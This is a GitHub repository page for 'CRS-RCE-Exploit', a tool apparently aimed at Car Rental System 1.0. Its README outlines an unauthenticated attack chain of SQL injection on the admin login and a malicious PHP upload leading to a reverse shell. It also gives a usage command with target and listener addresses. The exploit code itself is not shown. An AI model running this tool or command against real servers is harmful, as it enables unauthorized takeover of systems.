Skip to content
/ CRS-RCE-Exploit Public

Car Rental System 1.0 suffers from SQL Injection on administrator login page and unsecure upload mechanism allowing to upload malicious files. This allows unauthenticated user to obtain reverse shell to server.

License

Unlicense license
1 star 0 forks Branches Tags Activity
Star
Notifications

LongWayHomie/CRS-RCE-Exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits

CRS.PNG

CRS.PNG

 
 

CRS.py

CRS.py

 
 

LICENSE

LICENSE

 
 

README.md

README.md

 
 

Repository files navigation

CRS-RCE-Exploit

Car Rental System 1.0 suffers from SQL Injection on administrator login page and unsecure upload mechanism allowing to upload malicious PHP files.
This allows unauthenticated user to obtain administartor account and reverse shell to the application.
Vulnerabilites are used in the following steps:

  1. SQL Injection attack on the login form
  2. Upload the PHP code execution script
  3. Send the reverse shell payload

Usage example:

python3 CRS.py -t 192.168.1.120 -p 80 -L 192.168.1.100 -P 80

Screen

About

Car Rental System 1.0 suffers from SQL Injection on administrator login page and unsecure upload mechanism allowing to upload malicious files. This allows unauthenticated user to obtain reverse shell to server.

Resources

Readme

License

Unlicense license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages